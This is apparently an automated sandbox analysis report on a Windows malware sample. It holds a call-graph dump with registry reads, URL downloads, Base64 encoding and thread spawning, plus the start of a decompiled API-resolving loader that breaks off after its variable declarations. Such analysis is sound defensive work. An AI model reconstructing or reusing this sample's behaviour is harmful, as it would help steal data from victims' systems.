27591 29d955d4 27588->27591 27601 29d955e4 _memmove 27588->27601 27646 29dad440 67 API calls 2 library calls 27588->27646 27590->27587 27594 29d95573 27590->27594 27593 29d89750 77 API calls 27591->27593 27591->27601 27593->27601 27595 29d95578 27594->27595 27596 29d9558c 27594->27596 27635 29d89a20 27595->27635 27598 29d89a20 77 API calls 27596->27598 27600 29d9559a 27598->27600 27599 29d95586 27599->27570 27600->27570 27601->27570 27603 29da349c 27602->27603 27650 29d892c0 27603->27650 27605 29da34c0 27606 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27605->27606 27607 29da2bd3 27606->27607 27608 29d951e0 27607->27608 27609 29d894c0 77 API calls 27608->27609 27610 29d95202 27609->27610 27611 29da34d0 27610->27611 27612 29db5640 _memset 27611->27612 27613 29da3511 RegOpenKeyExA 27612->27613 27614 29da355a RegCloseKey CharToOemA 27613->27614 27615 29da3536 RegQueryValueExA 27613->27615 27616 29da3595 27614->27616 27615->27614 27616->27616 27617 29d892c0 77 API calls 27616->27617 27618 29da35ad 27617->27618 27619 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27618->27619 27620 29da2c00 27619->27620 27620->27580 27621->27567 27623 29d8978d 27622->27623 27624 29d897cf 27623->27624 27628 29d897d6 std::ios_base::_Tidy _memmove 27623->27628 27683 29dae70e 27623->27683 27624->27628 27695 29dae0fc 66 API calls std::exception::_Copy_str 27624->27695 27627 29d897ee 27696 29daff06 RaiseException 27627->27696 27628->27584 27630 29d89803 27697 29d898c0 77 API calls 3 library calls 27630->27697 27632->27570 27633->27583 27634->27584 27636 29d89a3d 27635->27636 27637 29d89a33 27635->27637 27639 29d89a5b 27636->27639 27648 29dad440 67 API calls 2 library calls 27636->27648 27647 29dad48d 67 API calls 2 library calls 27637->27647 27641 29d89a76 27639->27641 27644 29d89a86 _memmove 27639->27644 27649 29dad440 67 API calls 2 library calls 27639->27649 27643 29d89750 77 API calls 27641->27643 27641->27644 27643->27644 27644->27599 27645->27588 27646->27591 27647->27636 27648->27639 27649->27641 27651 29d892ce 27650->27651 27652 29d89327 27650->27652 27651->27652 27656 29d892f4 27651->27656 27653 29d8933a 27652->27653 27678 29dad440 67 API calls 2 library calls 27652->27678 27655 29d89750 77 API calls 27653->27655 27661 29d8934d _memmove 27653->27661 27655->27661 27657 29d892f9 27656->27657 27658 29d89310 27656->27658 27664 29d894c0 27657->27664 27660 29d894c0 77 API calls 27658->27660 27663 29d89321 27660->27663 27661->27605 27662 29d8930a 27662->27605 27663->27605 27665 29d894df 27664->27665 27666 29d894d5 27664->27666 27668 29d8950d 27665->27668 27669 29d894ee 27665->27669 27679 29dad48d 67 API calls 2 library calls 27666->27679 27671 29d8951c 27668->27671 27682 29dad440 67 API calls 2 library calls 27668->27682 27680 29d896c0 67 API calls 2 library calls 27669->27680 27674 29d89750 77 API calls 27671->27674 27677 29d8952f _memmove 27671->27677 27672 29d894fa 27681 29d896c0 67 API calls 2 library calls 27672->27681 27674->27677 27676 29d89504 27676->27662 27677->27662 27678->27653 27679->27665 27680->27672 27681->27676 27682->27671 27685 29dae718 27683->27685 27684 29dadfe0 _malloc 66 API calls 27684->27685 27685->27684 27686 29dae732 27685->27686 27689 29dae734 std::exception::exception 27685->27689 27698 29db35ce DecodePointer 27685->27698 27686->27624 27693 29dae772 27689->27693 27699 29daed61 76 API calls __cinit 27689->27699 27690 29dae77c 27701 29daff06 RaiseException 27690->27701 27700 29dae1a8 66 API calls std::exception::operator= 27693->27700 27694 29dae78d 27695->27627 27696->27630 27697->27628 27698->27685 27699->27693 27700->27690 27701->27694 27702 29d94697 lstrcatA 27703 29d946b2 std::ios_base::_Tidy 27702->27703 27704 29da3460 78 API calls 27703->27704 27705 29d946cc lstrcatA 27704->27705 27707 29d946f0 std::ios_base::_Tidy 27705->27707 27800 29da2e90 GetSystemInfo 27707->27800 27711 29d9473d OpenEventA 27713 29d9479e CreateEventA 27711->27713 27714 29d94770 CloseHandle Sleep OpenEventA 27711->27714 27712 29d9472e std::ios_base::_Tidy 27712->27711 27715 29d947b5 27713->27715 27714->27713 27714->27714 27807 29d93e30 27715->27807 27719 29d947f8 lstrcatA lstrcatA 27721 29d9482a lstrcatA 27719->27721 27722 29d94825 27719->27722 27720 29d947c7 _memset 27720->27719 27723 29d894c0 77 API calls 27721->27723 27722->27721 27724 29d94858 27723->27724 27874 29d986a0 27724->27874 27728 29d9486d 27892 29d927d0 98 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 27728->27892 27730 29d94883 27893 29d9fde0 818 API calls 4 library calls 27730->27893 27732 29d94906 27734 29d94913 27732->27734 27894 29d93ce0 137 API calls 2 library calls 27732->27894 27735 29d94925 27734->27735 27895 29d8f9c0 169 API calls 2 library calls 27734->27895 27896 29d92c90 343 API calls 4 library calls 27735->27896 27738 29d9492a 27739 29d9493e 27738->27739 27897 29d96770 210 API calls 2 library calls 27738->27897 27898 29d91230 240 API calls 4 library calls 27739->27898 27742 29d94943 27743 29d94950 27742->27743 27899 29da50a0 136 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 27742->27899 27900 29dad3b0 78 API calls 27743->27900 27746 29d94966 27747 29d9497a CryptBinaryToStringA 27746->27747 27748 29d949e0 CreateThread 27746->27748 27747->27748 27749 29d94999 GetProcessHeap HeapAlloc 27747->27749 27750 29d94a50 Sleep 27748->27750 27751 29d94a12 27748->27751 27749->27748 27752 29d949b4 _memset 27749->27752 27750->27750 27753 29d94a63 27750->27753 27751->27753 27754 29d94a1f CreateThread 27751->27754 27755 29d94a37 Sleep 27751->27755 27758 29d949c2 CryptBinaryToStringA 27752->27758 27901 29d81090 12 API calls 27753->27901 27754->27755 27755->27751 27759 29d94a4b 27755->27759 27757 29d94a68 27760 29d94f93 27757->27760 27761 29d892c0 77 API calls 27757->27761 27758->27748 27759->27750 27910 29da4e60 87 API calls 2 library calls 27760->27910 27763 29d94aa5 27761->27763 27765 29d892c0 77 API calls 27763->27765 27767 29d94acd 27765->27767 27769 29d892c0 77 API calls 27767->27769 27770 29d94af5 27769->27770 27771 29d892c0 77 API calls 27770->27771 27772 29d94b1d 27771->27772 27902 29d89980 77 API calls 27772->27902 27774 29d94b39 27903 29d89980 77 API calls 27774->27903 27776 29d94b54 27904 29d89980 77 API calls 27776->27904 27778 29d94b6f 27905 29da5230 90 API calls 2 library calls 27778->27905 27780 29d94b84 std::ios_base::_Tidy 27780->27760 27781 29d892c0 77 API calls 27780->27781 27782 29d94cd0 27781->27782 27783 29d892c0 77 API calls 27782->27783 27784 29d94cf8 27783->27784 27785 29d892c0 77 API calls 27784->27785 27786 29d94d20 27785->27786 27787 29d892c0 77 API calls 27786->27787 27788 29d94d48 27787->27788 27789 29d892c0 77 API calls 27788->27789 27790 29d94d70 27789->27790 27906 29d89980 77 API calls 27790->27906 27792 29d94d8c 27907 29d89980 77 API calls 27792->27907 27794 29d94da7 27908 29d89980 77 API calls 27794->27908 27796 29d94dc2 27909 29d89980 77 API calls 27796->27909 27798 29d94ddd std::ios_base::_Tidy 27799 29d94f5c CreateThread Sleep 27798->27799 27799->27760 27911 29da4720 27800->27911 27802 29da2ed7 27802->27802 27803 29d892c0 77 API calls 27802->27803 27805 29da2f12 std::ios_base::_Tidy 27803->27805 27804 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27806 29d9470a lstrcatA 27804->27806 27805->27804 27806->27711 27806->27712 27808 29db5640 _memset 27807->27808 27809 29d93e71 lstrcatA 27808->27809 27852 29d93e90 std::ios_base::_Tidy 27809->27852 27811 29d93f2d StrCmpCA 27811->27852 27812 29d93fe1 StrCmpCA 27813 29d94557 27812->27813 27812->27852 28071 29d8e9a0 77 API calls 27813->28071 27816 29d892c0 77 API calls 27816->27852 27817 29d8e8e0 77 API calls 27817->27852 27818 29d9456e std::ios_base::_Tidy 27820 29d8e910 77 API calls 27818->27820 27819 29d894c0 77 API calls 27819->27852 27860 29d94302 std::ios_base::_Tidy 27820->27860 27821 29d923b0 96 API calls 27821->27852 27822 29d925a0 115 API calls 27822->27852 27823 29d9408d StrCmpCA 27823->27852 27824 29d94141 StrCmpCA 27826 29d94503 27824->27826 27824->27852 27825 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27827 29d945ed 27825->27827 28070 29d8e9a0 77 API calls 27826->28070 27866 29dad220 27827->27866 27829 29d8e910 77 API calls 27829->27852 27830 29d9451a std::ios_base::_Tidy 27831 29d8e910 77 API calls 27830->27831 27831->27813 27833 29d941dc StrCmpCA 27834 29d944bb 27833->27834 27833->27852 28066 29d8e9a0 77 API calls 27834->28066 27836 29d94202 StrCmpCA 27837 29d94467 27836->27837 27836->27852 28064 29d8e9d0 77 API calls 27837->28064 27838 29d94228 StrCmpCA 27840 29d943f4 27838->27840 27838->27852 28062 29d8ea00 77 API calls 27840->28062 27841 29d944c6 std::ios_base::_Tidy 28067 29d8e910 27841->28067 27842 29d9424e StrCmpCA 27845 29d94381 27842->27845 27842->27852 28060 29d8ea00 77 API calls 27845->28060 27847 29d94274 StrCmpCA 27850 29d9432d 27847->27850 27847->27852 27848 29d94472 std::ios_base::_Tidy 28065 29d8ea00 77 API calls 27848->28065 28058 29d8ea00 77 API calls 27850->28058 27851 29d9429a StrCmpCA 27855 29d942ba 27851->27855 27856 29d942aa Sleep 27851->27856 27852->27811 27852->27812 27852->27816 27852->27817 27852->27819 27852->27821 27852->27822 27852->27823 27852->27824 27852->27829 27852->27833 27852->27836 27852->27838 27852->27842 27852->27847 27852->27851 28051 29d8e8b0 27852->28051 28054 29d8e940 77 API calls 27852->28054 28055 29d8e970 77 API calls 27852->28055 27854 29d943ff std::ios_base::_Tidy 28063 29d8ea00 77 API calls 27854->28063 28056 29d8ea00 77 API calls 27855->28056 27856->27852 27858 29d9438c std::ios_base::_Tidy 28061 29d8ea00 77 API calls 27858->28061 27860->27825 27862 29d94338 std::ios_base::_Tidy 28059 29d8ea00 77 API calls 27862->28059 27864 29d942c5 std::ios_base::_Tidy 28057 29d8ea00 77 API calls 27864->28057 27867 29dae70e std::_Mutex::_Mutex 77 API calls 27866->27867 27868 29dad24f 27867->27868 28072 29dabec0 27868->28072 27870 29dad291 27871 29dad29a 27870->27871 27872 29dae70e std::_Mutex::_Mutex 77 API calls 27870->27872 27871->27720 27873 29dad2bd 27872->27873 27873->27720 27875 29d986ef _memset 27874->27875 27876 29d986fe lstrlenA InternetCrackUrlA 27875->27876 27877 29d98748 StrCmpCA 27876->27877 27878 29d98743 27876->27878 27879 29d98758 27877->27879 27880 29d9875b GetProcessHeap RtlAllocateHeap 27877->27880 27878->27877 27879->27880 27881 29d9877a 27880->27881 27882 29d9877d InternetOpenA InternetSetOptionA 27880->27882 27881->27882 27883 29d987b4 InternetOpenUrlA 27882->27883 27885 29d9883a InternetCloseHandle InternetCloseHandle 27883->27885 27886 29d987ea 27883->27886 27888 29d98854 std::ios_base::_Tidy 27885->27888 27886->27885 27887 29d987f0 InternetReadFile 27886->27887 27887->27885 27887->27886 27889 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27888->27889 27890 29d94863 27889->27890 27891 29d8e3f0 87 API calls std::_Mutex::_Mutex 27890->27891 27891->27728 27892->27730 27893->27732 27894->27734 27895->27735 27896->27738 27897->27739 27898->27742 27899->27743 27900->27746 27901->27757 27902->27774 27903->27776 27904->27778 27905->27780 27906->27792 27907->27794 27908->27796 27909->27798 27924 29da63a0 27911->27924 27919 29da4803 std::ios_base::_Tidy 27961 29da4850 27919->27961 27922 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27923 29da484a 27922->27923 27923->27802 27965 29d98e90 27924->27965 27926 29da63ec 27975 29da20a0 27926->27975 27929 29da47a1 27931 29da1f70 27929->27931 28026 29dada9c 27931->28026 27934 29dae70e std::_Mutex::_Mutex 77 API calls 27935 29da1fb5 27934->27935 27941 29da1fea 27935->27941 28031 29dad974 82 API calls 8 library calls 27935->28031 27937 29da1fc3 27938 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27937->27938 27939 29da1fd6 27938->27939 27940 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27939->27940 27940->27941 27942 29da52f0 27941->27942 27943 29da5333 27942->27943 27944 29da5357 27943->27944 28033 29da0990 67 API calls 27943->28033 27946 29d98e50 2 API calls 27944->27946 27957 29da53c7 27944->27957 27947 29da5383 27946->27947 28034 29da7ce0 114 API calls 5 library calls 27947->28034 27949 29da548d 27950 29da47f5 27949->27950 28036 29da7000 67 API calls 27949->28036 27958 29da5a00 27950->27958 27951 29da538e 27954 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27951->27954 27951->27957 27955 29da53a6 27954->27955 27956 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27955->27956 27956->27957 27957->27949 28035 29d98d80 67 API calls 2 library calls 27957->28035 28037 29da6460 27958->28037 27962 29da4897 27961->27962 28046 29dad669 27962->28046 27964 29da4831 27964->27922 27966 29dae70e std::_Mutex::_Mutex 77 API calls 27965->27966 27967 29d98eca 27966->27967 27968 29d98f0b 27967->27968 27985 29dad974 82 API calls 8 library calls 27967->27985 27968->27926 27970 29d98ed8 27986 29dada5d 27970->27986 27996 29d98e50 27975->27996 27980 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27981 29da20f9 27980->27981 27982 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27981->27982 27983 29da211a 27982->27983 27983->27929 27984 29d98d80 67 API calls 2 library calls 27983->27984 27985->27970 27987 29d98eeb 27986->27987 27988 29dada6f 27986->27988 27990 29dada85 27987->27990 27994 29dadec8 EnterCriticalSection 27988->27994 27991 29d98f02 27990->27991 27992 29dada8c 27990->27992 27991->27926 27995 29daded8 LeaveCriticalSection 27992->27995 27994->27987 27995->27991 27997 29dada5d std::_Lockit::_Lockit EnterCriticalSection 27996->27997 27998 29d98e66 27997->27998 27999 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 27998->27999 28000 29d98e7a 27999->28000 28001 29da2340 28000->28001 28002 29dada5d std::_Lockit::_Lockit EnterCriticalSection 28001->28002 28003 29da2371 28002->28003 28004 29dada5d std::_Lockit::_Lockit EnterCriticalSection 28003->28004 28007 29da23b5 28003->28007 28005 29da2394 28004->28005 28006 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 28005->28006 28006->28007 28021 29da23f2 28007->28021 28022 29d98b30 114 API calls std::_Mutex::_Mutex 28007->28022 28008 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 28010 29da20df 28008->28010 28010->27980 28010->27983 28011 29da2400 28012 29da2423 28011->28012 28023 29dae158 66 API calls std::exception::exception 28011->28023 28014 29dada5d std::_Lockit::_Lockit EnterCriticalSection 28012->28014 28016 29da2436 28014->28016 28015 29da2415 28024 29daff06 RaiseException 28015->28024 28018 29dada85 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 28016->28018 28019 29da244a 28018->28019 28025 29dad6bc 77 API calls std::_Mutex::_Mutex 28019->28025 28021->28008 28022->28011 28023->28015 28024->28012 28025->28021 28027 29dae70e std::_Mutex::_Mutex 77 API calls 28026->28027 28028 29dadaa8 28027->28028 28032 29dadea8 InitializeCriticalSection 28028->28032 28030 29da1fa7 28030->27934 28031->27937 28032->28030 28033->27944 28034->27951 28036->27950 28038 29da649d 28037->28038 28039 29da64f3 28037->28039 28038->28039 28040 29da64a4 28038->28040 28042 29d892c0 77 API calls 28039->28042 28043 29da64ce std::ios_base::_Tidy 28039->28043 28041 29d892c0 77 API calls 28040->28041 28041->28043 28042->28043 28044 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 28043->28044 28045 29da5a16 28044->28045 28045->27919 28047 29dad678 std::ios_base::_Tidy 28046->28047 28049 29dad69d std::ios_base::_Tidy 28047->28049 28050 29d98a80 EnterCriticalSection LeaveCriticalSection std::locale::_Locimp::_Locimp_dtor std::_Lockit::_Lockit 28047->28050 28049->27964 28050->28049 28052 29d892c0 77 API calls 28051->28052 28053 29d8e8d3 28052->28053 28053->27852 28054->27852 28055->27852 28056->27864 28057->27860 28058->27862 28059->27860 28060->27858 28061->27860 28062->27854 28063->27860 28064->27848 28065->27860 28066->27841 28068 29d892c0 77 API calls 28067->28068 28069 29d8e936 28068->28069 28069->27826 28070->27830 28071->27818 28073 29dabeca 28072->28073 28074 29dabeec 28072->28074 28073->28074 28075 29dabef2 CreateFileMappingA 28073->28075 28074->27870 28076 29dabf0a MapViewOfFile 28075->28076 28077 29dabf33 28075->28077 28078 29dabf39 28076->28078 28079 29dabf22 CloseHandle 28076->28079 28077->27870 28078->27870 28079->28077

                                        Executed Functions

                                        Function 29DA8390 Relevance: 266.9, APIs: 151, Strings: 1, Instructions: 911libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1049 29da8390-29da8397 1050 29da839d-29da892e GetProcAddress * 59 1049->1050 1051 29da8933-29da89fd LoadLibraryA * 11 1049->1051 1050->1051 1052 29da8a03-29da8a8b GetProcAddress * 6 1051->1052 1053 29da8a90-29da8a97 1051->1053 1052->1053 1054 29da8a99-29da8ad8 GetProcAddress * 3 1053->1054 1055 29da8add-29da8ae4 1053->1055 1054->1055 1056 29da8aea-29da8c4d GetProcAddress * 15 1055->1056 1057 29da8c52-29da8c59 1055->1057 1056->1057 1058 29da8c5f-29da8d91 GetProcAddress * 13 1057->1058 1059 29da8d96-29da8d9d 1057->1059 1058->1059 1060 29da8e48-29da8e4f 1059->1060 1061 29da8da3-29da8e43 GetProcAddress * 7 1059->1061 1062 29da8e51-29da8ec0 GetProcAddress * 5 1060->1062 1063 29da8ec5-29da8ecc 1060->1063 1061->1060 1062->1063 1064 29da8fd8-29da8fdf 1063->1064 1065 29da8ed2-29da8fd3 GetProcAddress * 11 1063->1065 1066 29da8fe1-29da9020 GetProcAddress * 3 1064->1066 1067 29da9025-29da902c 1064->1067 1065->1064 1066->1067 1068 29da902e-29da906d GetProcAddress * 3 1067->1068 1069 29da9072-29da9079 1067->1069 1068->1069 1070 29da907f-29da9107 GetProcAddress * 6 1069->1070 1071 29da910c-29da9113 1069->1071 1070->1071 1072 29da9128-29da912f 1071->1072 1073 29da9115-29da9123 GetProcAddress 1071->1073 1074 29da91f2 1072->1074 1075 29da9135-29da91ed GetProcAddress * 8 1072->1075 1073->1072 1075->1074
                                        C-Code - Quality: 100%
                                        			E29DA8390() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				struct HINSTANCE__* _t3;
				CHAR* _t4;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t11;
				CHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				_Unknown_base(*)()* _t28;
				CHAR* _t29;
				_Unknown_base(*)()* _t30;
				struct HINSTANCE__* _t31;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t33;
				CHAR* _t34;
				_Unknown_base(*)()* _t35;
				struct HINSTANCE__* _t36;
				_Unknown_base(*)()* _t37;
				_Unknown_base(*)()* _t38;
				CHAR* _t39;
				_Unknown_base(*)()* _t40;
				_Unknown_base(*)()* _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				_Unknown_base(*)()* _t45;
				CHAR* _t46;
				_Unknown_base(*)()* _t47;
				struct HINSTANCE__* _t48;
				_Unknown_base(*)()* _t49;
				_Unknown_base(*)()* _t51;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t55;
				struct HINSTANCE__* _t56;
				_Unknown_base(*)()* _t57;
				_Unknown_base(*)()* _t59;
				struct HINSTANCE__* _t60;
				_Unknown_base(*)()* _t61;
				_Unknown_base(*)()* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				struct HINSTANCE__* _t65;
				_Unknown_base(*)()* _t66;
				_Unknown_base(*)()* _t67;
				CHAR* _t68;
				_Unknown_base(*)()* _t69;
				struct HINSTANCE__* _t70;
				_Unknown_base(*)()* _t71;
				_Unknown_base(*)()* _t72;
				CHAR* _t73;
				_Unknown_base(*)()* _t74;
				struct HINSTANCE__* _t75;
				_Unknown_base(*)()* _t77;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				_Unknown_base(*)()* _t80;
				CHAR* _t81;
				_Unknown_base(*)()* _t82;
				struct HINSTANCE__* _t83;
				_Unknown_base(*)()* _t85;
				CHAR* _t86;
				_Unknown_base(*)()* _t87;
				struct HINSTANCE__* _t88;
				_Unknown_base(*)()* _t89;
				_Unknown_base(*)()* _t90;
				CHAR* _t91;
				_Unknown_base(*)()* _t92;
				struct HINSTANCE__* _t93;
				_Unknown_base(*)()* _t94;
				_Unknown_base(*)()* _t96;
				struct HINSTANCE__* _t97;
				_Unknown_base(*)()* _t98;
				_Unknown_base(*)()* _t99;
				CHAR* _t100;
				_Unknown_base(*)()* _t101;
				struct HINSTANCE__* _t102;
				_Unknown_base(*)()* _t103;
				_Unknown_base(*)()* _t104;
				CHAR* _t105;
				_Unknown_base(*)()* _t106;
				struct HINSTANCE__* _t107;
				_Unknown_base(*)()* _t108;
				_Unknown_base(*)()* _t109;
				CHAR* _t110;
				_Unknown_base(*)()* _t111;
				struct HINSTANCE__* _t112;
				_Unknown_base(*)()* _t113;
				_Unknown_base(*)()* _t114;
				CHAR* _t115;
				_Unknown_base(*)()* _t117;
				struct HINSTANCE__* _t118;
				_Unknown_base(*)()* _t119;
				_Unknown_base(*)()* _t120;
				CHAR* _t121;
				_Unknown_base(*)()* _t122;
				struct HINSTANCE__* _t123;
				_Unknown_base(*)()* _t124;
				_Unknown_base(*)()* _t125;
				CHAR* _t126;
				_Unknown_base(*)()* _t127;
				struct HINSTANCE__* _t128;
				_Unknown_base(*)()* _t129;
				_Unknown_base(*)()* _t130;
				CHAR* _t131;
				_Unknown_base(*)()* _t132;
				struct HINSTANCE__* _t133;
				_Unknown_base(*)()* _t134;
				_Unknown_base(*)()* _t135;
				CHAR* _t136;
				_Unknown_base(*)()* _t137;
				struct HINSTANCE__* _t138;
				_Unknown_base(*)()* _t139;
				_Unknown_base(*)()* _t141;
				struct HINSTANCE__* _t142;
				_Unknown_base(*)()* _t143;
				_Unknown_base(*)()* _t145;
				struct HINSTANCE__* _t146;
				_Unknown_base(*)()* _t147;
				_Unknown_base(*)()* _t148;
				CHAR* _t149;
				_Unknown_base(*)()* _t150;
				struct HINSTANCE__* _t151;
				_Unknown_base(*)()* _t152;
				_Unknown_base(*)()* _t154;
				struct HINSTANCE__* _t155;
				_Unknown_base(*)()* _t156;
				_Unknown_base(*)()* _t157;
				CHAR* _t158;
				_Unknown_base(*)()* _t159;
				struct HINSTANCE__* _t160;
				_Unknown_base(*)()* _t161;
				_Unknown_base(*)()* _t162;
				CHAR* _t163;
				_Unknown_base(*)()* _t164;
				struct HINSTANCE__* _t165;
				_Unknown_base(*)()* _t166;
				_Unknown_base(*)()* _t167;
				CHAR* _t168;
				_Unknown_base(*)()* _t169;
				struct HINSTANCE__* _t170;
				_Unknown_base(*)()* _t171;
				_Unknown_base(*)()* _t172;
				CHAR* _t173;
				_Unknown_base(*)()* _t174;
				struct HINSTANCE__* _t175;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				CHAR* _t178;
				_Unknown_base(*)()* _t179;
				struct HINSTANCE__* _t180;
				_Unknown_base(*)()* _t181;
				_Unknown_base(*)()* _t182;
				CHAR* _t183;
				_Unknown_base(*)()* _t184;
				struct HINSTANCE__* _t185;
				_Unknown_base(*)()* _t186;
				_Unknown_base(*)()* _t187;
				CHAR* _t188;
				_Unknown_base(*)()* _t189;
				struct HINSTANCE__* _t190;
				_Unknown_base(*)()* _t191;
				_Unknown_base(*)()* _t192;
				CHAR* _t193;
				_Unknown_base(*)()* _t194;
				struct HINSTANCE__* _t195;
				_Unknown_base(*)()* _t196;
				CHAR* _t198;
				_Unknown_base(*)()* _t199;
				struct HINSTANCE__* _t200;
				_Unknown_base(*)()* _t201;
				_Unknown_base(*)()* _t202;
				CHAR* _t203;
				_Unknown_base(*)()* _t204;
				struct HINSTANCE__* _t205;
				_Unknown_base(*)()* _t206;
				_Unknown_base(*)()* _t207;
				CHAR* _t208;
				_Unknown_base(*)()* _t209;
				struct HINSTANCE__* _t210;
				_Unknown_base(*)()* _t211;
				_Unknown_base(*)()* _t212;
				CHAR* _t213;
				_Unknown_base(*)()* _t214;
				struct HINSTANCE__* _t215;
				_Unknown_base(*)()* _t216;
				_Unknown_base(*)()* _t217;
				CHAR* _t218;
				_Unknown_base(*)()* _t219;
				struct HINSTANCE__* _t220;
				_Unknown_base(*)()* _t221;
				_Unknown_base(*)()* _t222;
				CHAR* _t223;
				_Unknown_base(*)()* _t224;
				struct HINSTANCE__* _t225;
				_Unknown_base(*)()* _t226;
				_Unknown_base(*)()* _t227;
				CHAR* _t228;
				_Unknown_base(*)()* _t229;
				struct HINSTANCE__* _t230;
				_Unknown_base(*)()* _t231;
				_Unknown_base(*)()* _t232;
				CHAR* _t233;
				_Unknown_base(*)()* _t234;
				struct HINSTANCE__* _t235;
				_Unknown_base(*)()* _t236;
				_Unknown_base(*)()* _t237;
				CHAR* _t238;
				_Unknown_base(*)()* _t239;
				struct HINSTANCE__* _t240;
				_Unknown_base(*)()* _t241;
				CHAR* _t243;
				_Unknown_base(*)()* _t244;
				struct HINSTANCE__* _t245;
				_Unknown_base(*)()* _t246;
				_Unknown_base(*)()* _t247;
				CHAR* _t248;
				_Unknown_base(*)()* _t249;
				struct HINSTANCE__* _t250;
				CHAR* _t252;
				CHAR* _t253;
				CHAR* _t254;
				CHAR* _t255;
				struct HINSTANCE__* _t256;
				CHAR* _t257;
				struct HINSTANCE__* _t258;
				CHAR* _t259;
				struct HINSTANCE__* _t260;
				CHAR* _t261;
				CHAR* _t262;
				CHAR* _t263;
				struct HINSTANCE__* _t264;
				CHAR* _t265;
				CHAR* _t266;
				CHAR* _t267;
				CHAR* _t268;
				CHAR* _t269;
				CHAR* _t270;
				CHAR* _t271;
				struct HINSTANCE__* _t272;
				CHAR* _t273;
				struct HINSTANCE__* _t274;
				CHAR* _t275;
				struct HINSTANCE__* _t276;
				CHAR* _t277;
				CHAR* _t278;
				struct HINSTANCE__* _t279;
				struct HINSTANCE__* _t280;
				CHAR* _t281;
				struct HINSTANCE__* _t282;
				CHAR* _t283;
				CHAR* _t284;
				CHAR* _t285;
				struct HINSTANCE__* _t286;
				CHAR* _t287;
				struct HINSTANCE__* _t288;
				CHAR* _t289;
				struct HINSTANCE__* _t290;
				CHAR* _t291;
				struct HINSTANCE__* _t292;
				CHAR* _t293;
				CHAR* _t294;
				struct HINSTANCE__* _t295;
				CHAR* _t296;
				struct HINSTANCE__* _t297;
				CHAR* _t298;
				struct HINSTANCE__* _t299;
				CHAR* _t300;
				struct HINSTANCE__* _t301;
				CHAR* _t302;
				CHAR* _t303;
				CHAR* _t304;
				CHAR* _t305;
				CHAR* _t306;
				struct HINSTANCE__* _t307;
				CHAR* _t308;
				CHAR* _t309;
				CHAR* _t310;
				struct HINSTANCE__* _t311;
				CHAR* _t312;
				struct HINSTANCE__* _t313;
				CHAR* _t314;
				struct HINSTANCE__* _t315;
				CHAR* _t316;
				struct HINSTANCE__* _t317;
				CHAR* _t318;
				struct HINSTANCE__* _t319;
				CHAR* _t320;
				struct HINSTANCE__* _t321;
				CHAR* _t322;
				struct HINSTANCE__* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				CHAR* _t326;
				struct HINSTANCE__* _t327;
				CHAR* _t328;
				struct HINSTANCE__* _t329;
				CHAR* _t330;
				struct HINSTANCE__* _t331;
				CHAR* _t332;
				struct HINSTANCE__* _t333;
				CHAR* _t334;
				struct HINSTANCE__* _t335;
				CHAR* _t336;
				struct HINSTANCE__* _t337;
				CHAR* _t338;
				struct HINSTANCE__* _t339;
				CHAR* _t340;
				struct HINSTANCE__* _t341;
				CHAR* _t342;
				struct HINSTANCE__* _t343;
				CHAR* _t344;
				struct HINSTANCE__* _t345;
				CHAR* _t346;
				struct HINSTANCE__* _t347;
				CHAR* _t348;
				CHAR* _t349;
				CHAR* _t350;
				CHAR* _t351;
				CHAR* _t352;
				CHAR* _t353;
				struct HINSTANCE__* _t354;
				CHAR* _t355;
				struct HINSTANCE__* _t356;
				CHAR* _t357;
				struct HINSTANCE__* _t358;
				CHAR* _t359;
				struct HINSTANCE__* _t360;
				CHAR* _t361;
				struct HINSTANCE__* _t362;
				CHAR* _t363;
				struct HINSTANCE__* _t364;
				CHAR* _t365;
				struct HINSTANCE__* _t366;
				CHAR* _t367;
				struct HINSTANCE__* _t368;
				CHAR* _t369;
				struct HINSTANCE__* _t370;
				CHAR* _t371;
				CHAR* _t372;
				struct HINSTANCE__* _t373;
